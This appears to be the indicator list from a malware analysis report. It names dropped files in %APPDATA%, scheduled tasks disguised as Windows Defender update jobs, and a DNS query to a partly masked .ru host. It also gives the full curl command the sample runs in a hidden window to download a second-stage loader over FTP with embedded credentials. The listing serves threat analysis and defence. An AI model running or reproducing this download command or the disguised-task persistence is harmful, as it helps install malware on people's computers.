Technical Information
- %WINDIR%\tasks\windows defender daily update.job
- %WINDIR%\tasks\windows defender daily checking.job
- %APPDATA%\kernel.dll
- %APPDATA%\asf.exe
- %APPDATA%\autorun.exe
- %APPDATA%\curl.exe
- %TEMP%\dup2.tmp
- DNS ASK su####tmachine.ru
- ClassName: 'EDIT' WindowName: ''
- '%APPDATA%\kernel.dll' -s -p951753
- '%APPDATA%\autorun.exe'
- '%APPDATA%\asf.exe'
- '%APPDATA%\curl.exe' ftp://su####tmachine.ru/launcher_DOWNLOAD.exe --user ivanbonv_83ergsufx:qwerty12345 --output "%APPDATA%\loader.exe"
- '%APPDATA%\curl.exe' ftp://su####tmachine.ru/launcher_DOWNLOAD.exe --user ivanbonv_83ergsufx:qwerty12345 --output "%APPDATA%\loader.exe" (with hidden window)